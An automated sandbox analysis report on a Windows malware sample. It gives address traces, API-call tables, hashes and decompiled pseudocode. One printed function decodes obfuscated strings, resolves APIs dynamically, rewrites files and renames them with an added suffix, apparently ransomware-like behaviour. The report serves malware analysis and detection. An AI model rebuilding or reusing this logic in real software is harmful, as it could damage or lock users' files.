0x0041196b
0x0041196e
0x00411978
0x00411978
0x0041197c
0x00411981
0x004118ee
0x004118ef
0x004118f5
0x0041190f
0x00411915
0x00411915
0x00411988
0x00411991
0x0041199a
0x004119a3
0x004119ab
0x004119af
0x004119b3
0x004119b7
0x004119bb
0x004119bf
0x004119c4
0x004119c9
0x00411dbd
0x00411dbd
0x00411dc2
0x00411dc3
0x00411dc4
0x00411dc5
0x00411dc6
0x00411dc7
0x00411dc8
0x00411dc9
0x00411dca
0x00411dcb
0x00411dcc
0x00411dcd
0x00411dce
0x00411dcf
0x00411dd0
0x00411dd6
0x00411ddd
0x00411dde
0x00411ddf
0x00411de6
0x00411df1
0x00411df3
0x00411df7
0x00411dfd
0x00411e03
0x00411e11
0x00411e15
0x00411e20
0x00411e29
0x00411e2d
0x00411e31
0x00411e35
0x00411e39
0x00411e3f
0x00411e48
0x00411e4e
0x00411e4e
0x00411e51
0x00411e51
0x00411e54
0x00411e65
0x00411e65
0x00411e68
0x00411e6f
0x00411e78
0x00411e80
0x00411e82
0x00411e88
0x00411e89
0x00411e8d
0x00411e8f
0x00411e97
0x00411ea2
0x00411eac
0x00411eb0
0x00411ebd
0x00411ec5
0x00411ec9
0x00000000
0x00000000
0x00411ecf
0x00411ed3
0x00000000
0x00411ed5
0x00411ed5
0x00411eda
0x00411efb
0x00411f05
0x00411f13
0x00411f25
0x00411f30
0x00411f30
0x00411f83
0x00411f83
0x00411fa5
0x00411fb6
0x00411fbc
0x00411fbe
0x0041201a
0x00000000
0x00411fc0
0x00411fc0
0x00411fc6
0x00411fd7
0x00411fe3
0x00411fe8
0x00411ff2
0x00411ff3
0x00411ffa
0x00411ffe
0x0041201e
0x0041201e
0x00412000
0x0041200e
0x00412010
0x00412014
0x00412014
0x00411ffe
0x00412022
0x00412025
0x00412027
0x0041202e
0x00412030
0x00412030
0x00412033
0x00412036
0x00412058
0x0041205d
0x00412063
0x00412063
0x00412069
0x00412038
0x00412041
0x00412048
0x0041204e
0x00412050
0x00411e60
0x00000000
0x00000000
0x00412056
0x00412050
0x00412036
0x0041206f
0x00000000
0x00411f34
0x00411f59
0x00411f5b
0x00411f65
0x00411f65
0x00411f66
0x00411f70
0x00411f7d
0x00000000
0x00411f7d
0x00411e65
0x00412073
0x0041207b
0x00412081
0x00412088
0x00412092
0x00412092
0x00412098
0x004120a3
0x004120a8
0x004120ad
0x004120af
0x004120b3
0x004120b3
0x004120bd
0x004120c3
0x004120d4
0x004120db
0x004120de
0x004120e4
0x004120fe
0x00412109
0x00412129
0x0041212f
0x00412135
0x0041213b
0x00412140
0x00412159
0x00412161
0x00412169
0x00412171
0x00412179
0x00412181
0x0041218c
0x00412191
0x00412194
0x00412196
0x004129bf
0x00000000
0x0041219c
0x0041219c
0x004121a4
0x004121aa
0x004121ba
0x004121bc
0x004121c1
0x004121d0
0x004121d6
0x004121e2
0x004121e2
0x004121e8
0x004121e8
0x004121ed
0x004121f3
0x004121f8
0x00412203
0x00412209
0x00412215
0x0041221c
0x00412220
0x00412226
0x0041222b
0x0041222d
0x0041222f
0x00412231
0x00412235
0x00412237
0x0041223b
0x0041223f
0x00412243
0x00412247
0x0041224b
0x0041224d
0x0041233b
0x0041233b
0x00412340
0x00412340
0x00412342
0x0041234a
0x00412350
0x00412355
0x00412379
0x0041237e
0x0041237e
0x00412385
0x00412357
0x00412357
0x0041235d
0x00412362
0x00412363
0x00412375
0x00412375
0x0041238a
0x0041238a
0x0041238a
0x0041238f
0x00412393
0x00412395
0x00412397
0x004123a0
0x004123a0
0x004123a5
0x004123a8
0x004123ab
0x004123ac
0x004123ac
0x004123a0
0x004123b0
0x004123b5
0x004123b7
0x004123c0
0x004123c4
0x004123c6
0x004123ca
0x004123ce
0x004123d2
0x004123d8
0x004123de
0x004123de
0x004123e0
0x004123e4
0x004123ea
0x004123f2
0x004123f4
0x004123f6
0x00412400
0x00412402
0x00412403
0x00412405
0x00412407
0x00412407
0x0041240b
0x0041240b
0x00412407
0x00412422
0x00412422
0x0041242d
0x00412432
0x00412444
0x00412448
0x00412456
0x00412463
0x0041246b
0x00412472
0x0041247d
0x00412486
0x0041248a
0x00412490
0x00412496
0x00412498
0x0041249e
0x004124a2
0x004124aa
0x004124b0
0x004124b6
0x004124c5
0x004124d0
0x004124d3
0x004124e0
0x004124ed
0x00412506
0x00412509
0x0041251d
0x00412521
0x00412527
0x00412529
0x00412529
0x00412529
0x00412529
0x004124b0
0x00000000
0x00412498
0x00000000
0x00412530
0x00412534
0x00412538
0x00412539
0x0041253d
0x0041253d
0x00412547
0x0041254d
0x00412551
0x00412551
0x0041255c
0x0041255f
0x00412561
0x004125a0
0x004125a4
0x004125ad
0x004125b2
0x004125b7
0x004125ba
0x004125c0
0x004125c6
0x004125c7
0x004125cb
0x004125d0
0x004125d4
0x004125e7
0x004125f3
0x004125f5
0x00412604
0x00412607
0x0041260b
0x00412613
0x00412617
0x00412617
0x0041261a
0x0041261e
0x00412620
0x00412620
0x00412625
0x00412625
0x00412639
0x0041263f
0x00412649
0x00412655
0x00412658
0x0041265a
0x00412660
0x00412662
0x00412670
0x00412670
0x0041268e
0x00412691
0x00412693
0x00000000
0x00000000
0x00412699
0x0041269d
0x004126a1
0x004126b8
0x004126c8
0x004126d1
0x004126d3
0x00000000
0x004126d5
0x004126da
0x004126ed
0x004126f4
0x004126f6
0x00412701
0x00000000
0x00412701
0x004126a3
0x004126b4
0x00412704
0x00412704
0x00412708
0x0041270a
0x00000000
0x00000000
0x00412710
0x0041270a
0x00000000
0x004126a1
0x00412720
0x00412720
0x00412662
0x00412722
0x00412722
0x00412729
0x0041272c
0x00412731
0x00412738
0x00412749
0x00412749
0x00412731
0x0041274f
0x0041276a
0x0041276c
0x00412774
0x00412778
0x00412784
0x0041279b
0x004127aa
0x004127b8
0x004127ba
0x004127c8
0x004127d0
0x004127d0
0x004127df
0x004127e5
0x004127e7
0x004127ed
0x004127f5
0x004127fd
0x00412801
0x00412801
0x0041280d
0x00412822
0x00412824
0x00412842
0x0041284c
0x0041284e
0x0041285b
0x00412861
0x00412869
0x00412871
0x00412880
0x00412882
0x0041288b
0x0041288c
0x0041288e
0x0041289b
0x004128a1
0x004128a2
0x004128a4
0x004128a6
0x004128a8
0x004128aa
0x004128af
0x004128b4
0x004128b6
0x004128b8
0x004128be
0x004128bf
0x004128c0
0x004128c5
0x004128c7
0x004128c9
0x004128cb
0x004128cd
0x004128cf
0x004128d1
0x004128d3
0x004128d4
0x004128d5
0x004128d9
0x004128e2
0x004128e3
0x004128e3
0x004128e8
0x004128f9
0x004128fd
0x00412902
0x0041290a
0x0041290e
0x00412914
0x0041291a
0x0041291c
0x00412921
0x00412923
0x00412929
0x0041292b
0x00412930
0x00412930
0x00412932
0x00412938
0x0041293a
0x00000000
0x0041293c
0x0041293c
0x0041293e
0x00000000
0x00000000
0x0041293e
0x00000000
0x00412940
0x00412940
0x00412941
0x00412941
0x00412930
0x00412945
0x00412945
0x0041294b
0x0041294d
0x00412953
0x00412955
0x00412965
0x00412957
0x00412957
0x00412960
0x00412960
0x0041296a
0x0041296a
0x0041294f
0x0041294f
0x0041294f
0x0041296d
0x0041296f
0x00412997
0x00412997
0x00412971
0x00412971
0x00412977
0x00000000
0x00412979
0x00412979
0x0041297f
0x00000000
0x00412981
0x0041298f
0x0041298f
0x0041297f
0x00412977
0x00412999
0x0041299e
0x004129a4
0x004129ad
0x004129ad
0x004129b5
0x004129be
0x00412563
0x00412563
0x00412565
0x0041256b
0x00412597
0x00412598
0x0041259d
0x00000000
0x0041256d
0x0041256d
0x00412570
0x00000000
0x00412576
0x00412576
0x00412579
0x0041257b
0x00000000
0x00412581
0x00412581
0x00412583
0x00412586
0x00000000
0x0041258c
0x0041258c
0x0041258f
0x00000000
0x00412595
0x00412595
0x00000000
0x00412595
0x0041258f
0x00412586
0x0041257b
0x00412570
0x0041256b
0x00412253
0x00412253
0x00412253
0x00412253
0x00412259
0x0041225b
0x004122c4
0x004122c4
0x004122c6
0x0041231c
0x0041231c
0x0041231e
0x00412320
0x00000000
0x00412320
0x00000000
0x004122c8
0x004122cc
0x004122cf
0x00000000
0x004122d1
0x004122d6
0x004122d9
0x00000000
0x004122df
0x004122df
0x004122e5
0x004122e6
0x004122f0
0x004122f6
0x004122f9
0x004122fb
0x004122ff
0x00412304
0x00412308
0x0041230c
0x00412310
0x00412314
0x00412318
0x00000000
0x00412318
0x004122d9
0x004122cf
0x0041225d
0x0041225d
0x0041225f
0x00000000
0x00412261
0x00412261
0x00412263
0x00412265
0x004122bb
0x004122bb
0x004122bd
0x004122bf
0x00412323
0x00412323
0x00412323
0x00000000
0x00412267
0x0041226b
0x0041226e
0x00000000
0x00412270
0x00412275
0x00412278
0x004129c4
0x004129c4
0x004129c9
0x004129ce
0x004129ce
0x004129d3
0x004129d3
0x004129d8
0x004129d8
0x004129dd
0x004129dd
0x004129e2
0x004129e3
0x004129e4
0x004129e5
0x004129e6
0x004129e7
0x004129e8
0x004129e9
0x004129ea
0x004129eb
0x004129ec
0x004129ed
0x004129ee
0x004129ef
0x004129f0
0x004129f6
0x004129fd
0x004129ff
0x00412a04
0x00412a04
0x00412a0a
0x00412a0a
0x00412a0f
0x00412a14
0x00412a1c
0x00412a1d
0x00412a21
0x00412a29
0x00412a2a
0x00412a2c
0x00412a2e
0x00412a30
0x00412a35
0x00412a37
0x00412a39
0x00412a47
0x00412a4d
0x00412a4d
0x00412a3b
0x00412a3b
0x00412a3b
0x00412a53
0x00412a5b
0x00412a5d
0x00412a64
0x00412a66
0x00412a75
0x00412a7a
0x00412a7a
0x00412a64
0x00412a7d
0x00412a83
0x00412a88
0x00412a8e
0x00412a94
0x00412ab3
0x00412ab3
0x00412ab8
0x00412a96
0x00412a96
0x00412aa0
0x00412aac
0x00412aac
0x00412abd
0x00412ac5
0x00412acb
0x00412ad0
0x00412ad1
0x00412ad9
0x00412ade
0x00412ae3
0x00412ae8
0x00412aed
0x00412af3
0x00412af6
0x00412af8
0x00412b07
0x00412b0c
0x00412b12
0x00412b1f
0x00412b23
0x00412b28
0x00412b2c
0x00412b32
0x00412b38
0x00412b3a
0x00412b47
0x00412b4b
0x00412b52
0x00412b56
0x00412b5e
0x00412b69
0x00412b71
0x00412b77
0x00412b86
0x00412b88
0x00412b8c
0x00412b8e
0x00412b90
0x00412b90
0x00412b90
0x00412ba8
0x00412bb7
0x00412bdb
0x00412be1
0x00412be3
0x00412bfe
0x00412c03
0x00412c0d
0x00412c12
0x00412c17
0x00412c2e
0x00412c45
0x00412c47
0x00412c60
0x00412c6f
0x00412c71
0x00412c71
0x00412c73
0x00412c7b
0x00412c7b
0x00412c8d
0x00412c93
0x00412c99
0x00412c9c
0x00412ca9
0x00412cb0
0x00412cbe
0x00412cc7
0x00412cd7
0x00412ce9
0x00412cf4
0x00412cfc
0x00412cfe
0x00412d0a
0x00412d25
0x00412d25
0x00412d28
0x00412d2d
0x00412d33
0x00412d38
0x00412d38
0x00412d3d
0x00412d3f
0x00412d3f
0x00412d48
0x00412d4f
0x00412d58
0x00412d5a
0x00412d5d
0x00412d5d
0x00412d63
0x00412d6c
0x0041227e
0x0041227e
0x00412284
0x00412285
0x0041228f
0x00412295
0x00412298
0x0041229a
0x0041229e
0x004122a3
0x004122a7
0x004122ab
0x004122af
0x004122b3
0x004122b7
0x00000000
0x004122b7
0x00412278
0x0041226e
0x00412265
0x0041225f
0x00000000
0x00412325
0x00412325
0x00412329
0x0041232a
0x0041232b
0x0041232f
0x00412333
0x00412333
0x00000000
0x00412253
0x0041224d
0x004119cf
0x004119cf
0x004119d7
0x004119d9
0x004119e0
0x004119e5
0x004119ec
0x00411a0d
0x00411a15
0x00411a50
0x00411a58
0x00411a5e
0x00411a64
0x00411a67
0x00411a6a
0x00411a6f
0x00411a73
0x00411a77
0x00411a7a
0x00411a7e
0x00411a82
0x00411a17
0x00411a17
0x00411a1f
0x00411a23
0x00411a28
0x00411a37
0x00411a3b
0x00411a3f
0x00411a43
0x00411a46
0x00411a4a
0x00411a4a
0x00411a87
0x00411a90
0x00411a99
0x00411a9e
0x00411ab2
0x00411ab7
0x00411b08
0x00411b0c
0x00411b10
0x00411b16
0x00411b1a
0x00411b1d
0x00411b22
0x00411b2b
0x00411b30
0x00411b31
0x00411b35
0x00411b38
0x00411b3e
0x00411b3e
0x00411b3e
0x00411b40
0x00411b44
0x00411b48
0x00411b4c
0x00411b50
0x00411ab9
0x00411ab9
0x00411abf
0x00411ac3
0x00411ac9
0x00411acd
0x00411ad0
0x00411ad5
0x00411ae0
0x00411ae4
0x00411ae8
0x00411aee
0x00411af2
0x00411af6
0x00411afa
0x00411afe
0x00411b02
0x00411b02
0x00411b55
0x00411b5e
0x00411b67
0x00411b70
0x00411b7a
0x00411b7f
0x00411b7f
0x00411b84
0x00411b90
0x00411b90
0x00411b90
0x00411b86
0x00411b86
0x00411b86
0x00411b94
0x00411b9c
0x00411ba0
0x00411ba5
0x00411bab
0x00411bae
0x00411bbb
0x00411bbe
0x00411bbf
0x00411bbf
0x00411bc2
0x00411bcc
0x00411bd0
0x00411bd4
0x00411bd8
0x00411bdc
0x00411be1
0x00411be5
0x00411be9
0x00411bed
0x00411bf1
0x00411bf9
0x00411bff
0x00411c92
0x00411c92
0x00411c0a
0x00411c0a
0x00411c19
0x00411c22
0x00411c39
0x00411c41
0x00411c42
0x00411c5f
0x00411c74
0x00411c76
0x00411c24
0x00411c30
0x00411c32
0x00411c32
0x00411c22
0x00411c95
0x00411c9b
0x00411ca1
0x00411ca5
0x00411ca8
0x00411cab
0x00411cb0
0x00411cb4
0x00411c9d
0x00411c9d
0x00411c9d
0x00411cb8
0x00411cbe
0x00411cc6
0x00411ce4
0x00411cd1
0x00411cdd
0x00411cdd
0x00411cf0
0x00411cf2
0x00411cfd
0x00411d03
0x00411d06
0x00411d12
0x00411d15
0x00411d19
0x00411d21
0x00411d24
0x00411d28
0x00411d2c
0x00411d32
0x00411d35
0x00411d38
0x00411d3c
0x00411d40
0x00411d44
0x00411d47
0x00411d4b
0x00411d4f
0x00411d4f
0x00411d63
0x00411d6b
0x00411d7f
0x00411d85
0x00411d94
0x00411d9e
0x00411da7
0x00411db7
0x00411db7
0x004119c9
0x00000000

APIs

PathCommonPrefixA.SHLWAPI(00000000,00000000,00000000), ref: 0041139B
GetFileInformationByHandle.KERNELBASE(?,?), ref: 004113C0
PathCompactPathA.SHLWAPI(00000000,00000000,00000000), ref: 004113CD
new.LIBCMT ref: 00411407

Part of subcall function 0041500C: Concurrency::cancel_current_task.LIBCPMT ref: 0041502B

Part of subcall function 004132E0: new.LIBCMT ref: 00413335

OpenFileMappingA.KERNEL32(00000002,00000000,?), ref: 004114A3
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 004114B2
GetDC.USER32(00000000), ref: 004114EA
CreateCompatibleDC.GDI32(00000000), ref: 00411512
CreateFontA.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,0044CC68), ref: 00411560
SelectObject.GDI32(?,00000000), ref: 004115A1
SelectObject.GDI32(?,00000000), ref: 004115A5
SelectObject.GDI32(00000000,00000000), ref: 004115AA
CreateDIBSection.GDI32 ref: 00411665
SelectObject.GDI32(00000000,00000000), ref: 00411672
SetBkMode.GDI32(00000000,00000001), ref: 004116D3
SetTextColor.GDI32(00000000,00FFFFFF), ref: 004116E1
TextOutA.GDI32(00000000,00000000,00000000,0044CB60,0044CB61), ref: 00411704
SendMessageA.USER32(00000000,00000102,?), ref: 00411795
SelectObject.GDI32(00000000,?), ref: 004117AC
GetOpenFileNameA.COMDLG32(00000058), ref: 00411848
DeleteObject.GDI32(00000000), ref: 00411856
SelectObject.GDI32(00000000,?), ref: 0041185D
DeleteObject.GDI32(00000000), ref: 00411861
DeleteObject.GDI32(00000000), ref: 00411864
GetWindowDC.USER32(00000000), ref: 004118EF
GetWindowRect.USER32(00000000,?), ref: 00411915
PdhOpenQueryA.PDH(00000000,00000000,?), ref: 00411991
OleTranslateColor.OLEAUT32(00000000,00000000,?), ref: 004119A3
new.LIBCMT ref: 004119BF

Part of subcall function 00413250: new.LIBCMT ref: 004132A2

__libm_sse2_cos_precise.LIBCMT ref: 00411A6A
__libm_sse2_cos_precise.LIBCMT ref: 00411D06
VirtualAlloc.KERNELBASE(00000000,0000076C,00003000,-00000040), ref: 00411D7F
Shell_NotifyIconA.SHELL32(00000001,?), ref: 00411D94

Strings

gfff, xrefs: 00411352
(, xrefs: 00411623
X, xrefs: 004117C7

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Object$Select$File$CreateDeleteOpenPath$ColorTextWindow__libm_sse2_cos_precise$AllocCommonCompactCompatibleConcurrency::cancel_current_taskFontHandleIconInformationMappingMessageModeNameNotifyPrefixQueryRectSectionSendShell_TranslateViewVirtual
String ID: ($X$gfff
API String ID: 1998898850-3707947071
Opcode ID: 97908ed3fb9cf253504ea63a3191dae2874daa20ea35395b22e2086d6ae3f24b
Instruction ID: 75eba2b4a11ef023ef62c9de42ffa5e0617d473244969ca47ba0696130368903
Opcode Fuzzy Hash: 97908ed3fb9cf253504ea63a3191dae2874daa20ea35395b22e2086d6ae3f24b
Instruction Fuzzy Hash: C352AD719083408FD361DF35DC81B9ABBF4BB86344F04862EF985A72A1E774A485CF4A

Uniqueness

Uniqueness Score: 100.00%

Function 0040803D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 163
stringlibraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 95%

			E0040803D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				struct HINSTANCE__* _v12;
				char _v13;
				intOrPtr _v16;
				intOrPtr _v17;
				intOrPtr _v20;
				intOrPtr _v21;
				char _v22;
				short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				void* __ebx;
				WCHAR* _t54;
				WCHAR* _t58;
				WCHAR* _t59;
				void* _t61;
				void* _t70;
				char _t73;
				struct HINSTANCE__* _t76;
				WCHAR* _t80;
				signed int _t84;
				signed int _t88;
				void* _t101;
				signed int _t103;
				WCHAR* _t104;
				WCHAR* _t107;

				_t101 = __edx;
				_t54 =  *0x4198a0; // 0x6590000
				_t84 = 0;
				_t103 = 0;
				if(_t54 != 0) {
					_t103 = 2 + lstrlenW(_t54) * 2;
				}
				_t107 = _a4;
				_t58 = E0040C6BA(0x18 + (lstrlenW(_t107) + _t103) * 2); // executed
				_t104 = _t58;
				if(_t104 != 0) {
					_t59 =  *0x4198a0; // 0x6590000
					if(_t59 != 0) {
						wsprintfW(_t104, L"%s%s", _t107, _t59);
					} else {
						_v52 = 0x75181fd6;
						_v48 = 0xb9c10198;
						_v44 = 0x7288836b;
						_v40 = 0xc35305f4;
						_v36 = 0xba9e21bd;
						_v32 = 0xba9e21ad;
						_v28 = 0x8249e305;
						_v24 = 0xdd69d68e;
						_v20 = 0xe77ff9bd;
						_v16 = 0xe804159a;
						_t80 = E00407563( &_v52);
						_push(0x5c);
						wsprintfW(_t104, _t80, _t107);
					}
					_t61 = E00408277(_t101, _t107); // executed
					if(_t61 == 0) {
						if(E004083F2(_t101, _t107) == 0 &&  *((intOrPtr*)(_a8 + 0x20)) >= 2) {
							E0040831E(_t107); // executed
							asm("sbb ebx, ebx");
							_t67 =  *0x4198bc;
							_t88 =  !_t84 & 0x00000001;
							if( *0x4198bc == 0) {
								_t73 = 0x5c;
								_v22 = _t73;
								_v56 = 0x78084c82;
								_v52 = 0xe5d698e2;
								_v48 = 0x38bdcb9b;
								_v44 = 0xfd23aae0;
								_v40 = 0x7fca2084;
								_v36 = 0x7fca2090;
								_v32 = 0x639d384b;
								_v28 = 0xcd3f6002;
								_v24 = 0xc61b;
								_v21 = 0x3312341e;
								_v17 = 0x6bdb5b58;
								_v13 = 0x1e;
								_t76 = GetModuleHandleW(E00407563( &_v56));
								_v12 = _t76;
								if(_t76 == 0) {
									_t67 =  *0x4198bc;
								} else {
									_v104 = 0x5a97a209;
									_v100 = 0xce80601c;
									_v96 = 0x84ab52f;
									_v92 = 0xc8bb71db;
									_v88 = 0xbe6cc7d4;
									_v84 = 0xbe6cc7c1;
									_v80 = 0x627c7ccf;
									_v76 = 0x751cbd43;
									_v72 = 0xeaf896a3;
									_v68 = 0x58572c75;
									_v64 = 0xfc214bdb;
									_v60 = 0x77;
									 *0x4198bc = GetProcAddress(_v12, E00407563( &_v104));
								}
							}
							asm("sbb eax, eax");
							_v8 = _v8 & 0x00000000;
							_t70 = E00401720(_t101, _t107, _a12,  ~_t67 & _t104, _t88, _a8,  &_v8); // executed
							if(_t70 != 0 && _v8 != 0) {
								E004010BB(_t88, 1, 0x3a7a746e);
								MoveFileExW(_t107, _t104, 1); // executed
							}
						}
						_t84 = 1;
					}
					E0040C6D1(_t104); // executed
					_t58 = _t84;
				}
				return _t58;
			}

0x0040803d
0x00408040
0x0040804a
0x0040804d
0x00408051
0x0040805a
0x0040805a
0x00408061
0x00408075
0x0040807a
0x0040807f
0x00408085
0x0040808c
0x004080f7
0x0040808e
0x00408091
0x00408099
0x004080a0
0x004080a7
0x004080ae
0x004080b5
0x004080bc
0x004080c3
0x004080ca
0x004080d1
0x004080d8
0x004080de
0x004080e4
0x004080ea
0x00408101
0x00408109
0x00408118
0x0040812c
0x00408134
0x00408136
0x0040813d
0x00408142
0x0040814a
0x0040814b
0x00408152
0x00408159
0x00408160
0x00408167
0x0040816e
0x00408175
0x0040817c
0x00408183
0x0040818a
0x00408190
0x00408197
0x0040819e
0x004081a9
0x004081af
0x004081b4
0x00408222
0x004081b6
0x004081b9
0x004081c1
0x004081c8
0x004081cf
0x004081d6
0x004081dd
0x004081e4
0x004081eb
0x004081f2
0x004081f9
0x00408200
0x00408207
0x0040821b
0x0040821b
0x004081b4
0x00408230
0x00408232
0x0040823e
0x00408248
0x00408257
0x00408262
0x00408262
0x00408248
0x00408266
0x00408266
0x00408268
0x0040826e
0x0040826e
0x00408276

APIs

lstrlenW.KERNEL32(06590000,00000001,?,00000000), ref: 00408054
lstrlenW.KERNEL32(00000010,00000001,?,00000000), ref: 00408065

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

wsprintfW.USER32 ref: 004080E4
wsprintfW.USER32 ref: 004080F7

Part of subcall function 00408277: lstrlenW.KERNEL32(00000000,00003000,00000004,00000010,00000000,?,?,00408106), ref: 004082B3
Part of subcall function 00408277: VirtualAlloc.KERNELBASE(00000000,00000000,?,?,00408106), ref: 004082C3
Part of subcall function 00408277: wsprintfW.USER32 ref: 004082D7
Part of subcall function 00408277: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0040830F

GetModuleHandleW.KERNEL32(00000000), ref: 004081A9
GetProcAddress.KERNEL32(00000010,00000000), ref: 00408215

Part of subcall function 00401720: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,88000000,00000000,00000010,00000000,00000000), ref: 00401769
Part of subcall function 00401720: ReadFile.KERNELBASE(00000000,00000000,0000021C,?,00000000), ref: 004017AA
Part of subcall function 00401720: ReadFile.KERNELBASE(00000010,77D66200,?,?,00000000), ref: 004018AE
Part of subcall function 00401720: WriteFile.KERNELBASE(00000010,00408C89,00408243,?,00000000), ref: 00401939
Part of subcall function 00401720: WriteFile.KERNELBASE(00000010,00000000,0000021C,?,00000000), ref: 004019A7

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

MoveFileExW.KERNEL32(00000010,00000000,00000001), ref: 00408262

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Part of subcall function 004083F2: lstrlenW.KERNEL32(00408115,00000000,00000010,00000000), ref: 00408408
Part of subcall function 004083F2: lstrlenW.KERNEL32(00408115), ref: 0040840D

Part of subcall function 0040831E: lstrlenW.KERNEL32(00000000,00003000,00000004,00000010,00000000,00000000,00000010,?,00408131,00000010), ref: 00408357
Part of subcall function 0040831E: VirtualAlloc.KERNELBASE(00000000,00000000,?,00408131,00000010), ref: 00408367
Part of subcall function 0040831E: wsprintfW.USER32 ref: 0040837A
Part of subcall function 0040831E: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0040839E

Strings

w, xrefs: 00408207
%s%s, xrefs: 004080F1
u,WX, xrefs: 004081F9

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: FileVirtuallstrlen$wsprintf$AllocFree$ReadWrite$AddressCreateHandleLibraryLoadModuleMoveProc
String ID: %s%s$u,WX$w
API String ID: 2890757166-73135023
Opcode ID: 85893a8e996a29a346b96edfe008eb067e0b21d48ce02af8258177c0af3c8a83
Instruction ID: bfec53c94c6b2994c0c930b6410cc848c1de9c556537b5ba01818212e9db9bac
Opcode Fuzzy Hash: 85893a8e996a29a346b96edfe008eb067e0b21d48ce02af8258177c0af3c8a83
Instruction Fuzzy Hash: 7E51D0B0900709AFDB10EFA9DD85AEEBB78EF05304F20406DE445BA250DB395A41CB69

Uniqueness

Uniqueness Score: 100.00%

Function 0040831E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57
memorystringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E0040831E(intOrPtr _a4) {
				signed int _v8;
				void* _t12;
				WCHAR* _t17;
				void* _t23;
				void* _t27;
				void* _t31;

				_t23 = 0;
				_t31 =  *0x419880 - _t23; // 0x413f78
				if(_t31 != 0) {
					_v8 = _v8 & 0;
					_t17 = E00408E03(_a4,  &_v8);
					if(_v8 != 0) {
						_t12 = VirtualAlloc(0, 4 + lstrlenW(_t17) * 2, 0x3000, 4); // executed
						_t27 = _t12;
						if(_t27 != 0) {
							wsprintfW(_t27, L"%s ", _t17);
							if(E0040C552( *0x419880, _t27) != 0) {
								_t23 = 1;
							}
							VirtualFree(_t27, 0, 0x8000); // executed
							_t12 = _t23;
						}
					} else {
						_t12 = 0;
					}
				} else {
					_t12 = 0;
				}
				return _t12;
			}

0x00408323
0x00408325
0x0040832b
0x00408331
0x00408341
0x00408348
0x00408367
0x0040836d
0x00408371
0x0040837a
0x00408391
0x00408395
0x00408395
0x0040839e
0x004083a4
0x004083a4
0x0040834a
0x0040834a
0x0040834a
0x0040832d
0x0040832d
0x0040832d
0x004083ac

APIs

Part of subcall function 00408E03: lstrlenW.KERNEL32(00408106,00000010,?,0040829C,00408106,00000000,00000000,?,?,00408106), ref: 00408E0B

lstrlenW.KERNEL32(00000000,00003000,00000004,00000010,00000000,00000000,00000010,?,00408131,00000010), ref: 00408357
VirtualAlloc.KERNELBASE(00000000,00000000,?,00408131,00000010), ref: 00408367
wsprintfW.USER32 ref: 0040837A
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0040839E

Strings

x?A, xrefs: 00408325
%s , xrefs: 00408374

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtuallstrlen$AllocFreewsprintf
String ID: %s $x?A
API String ID: 3114517310-1613349781
Opcode ID: 2d217afdef1bda83c5265269c06f80e3af1cf69740ac511347f5cf04a78abfaa
Instruction ID: 17c0838e4ae417312e2f2fb548b2c9483d7f5baabe1d647979152b293b48342c
Opcode Fuzzy Hash: 2d217afdef1bda83c5265269c06f80e3af1cf69740ac511347f5cf04a78abfaa
Instruction Fuzzy Hash: 5B01F971A05204BFE3119B619D45FEB779CE7C4B91F10403BFB41E11A0EA359D0196AC

Uniqueness

Uniqueness Score: 100.00%

Function 0040C05D, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 47%

			E0040C05D(void* __eflags, char* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v26;
				short _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v56;
				void* __ebx;
				intOrPtr* _t37;
				void* _t38;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				intOrPtr* _t47;
